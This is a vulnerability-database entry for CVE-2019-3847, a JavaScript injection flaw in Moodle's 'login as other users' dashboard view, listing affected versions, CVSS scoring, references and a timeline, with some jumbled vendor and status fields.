JavaScript Injection Vulnerability in Moodle, Affected by Unauthorized User Access
CVE-2019-3847

5.4MEDIUM

Key Information:

Vendor: [unknown]
Status: Moodle
Vendor: CVE Published:; 27 March 2019

Badges

👾 Exploit Exists🟡 Public PoC

What is CVE-2019-3847?

A vulnerability exists in Moodle versions prior to 3.6.3, 3.5.5, 3.4.8, and 3.1.17, allowing users with permissions to log in as other users to view their Dashboards without proper sanitization. This flaw permits the display of unescaped JavaScript code included by the original user, potentially leading to harmful exploits that could compromise user data. Administrators and managers who utilize the 'login as other users' feature are particularly at risk, as they can inadvertently expose sensitive information through malicious scripts.

Affected Version(s)

Moodle 3.6 to 3.6.2

Moodle 3.5 to 3.5.4

Moodle 3.4 to 3.4.7

Exploit Proof of Concept (PoC)

PoC code is written by security researchers to demonstrate the vulnerability can be exploited. PoC code is also a key component for weaponization which could lead to ransomware.

moodle-login-csrf
Created by danielthatcher

References

http://www.securityfocus.com/bid/107489

vdb-entry

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3847

https://moodle.org/mod/forum/discuss.php?d=384010#p1547742

CVSS V3.1

Score:

5.4

Severity:

MEDIUM

Confidentiality:

Low

Integrity:

Low

Availability:

Low

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

Low

User Interaction:

None

Scope:

Unchanged

Download the Critical Vulnerability Management Cheat Sheet

Timeline

🟡
Public PoC available
Apr 4, 2019
👾
Exploit known to exist
Apr 4, 2019
Vulnerability published
Mar 27, 2019
Vulnerability Reserved
Jan 3, 2019

[unknown]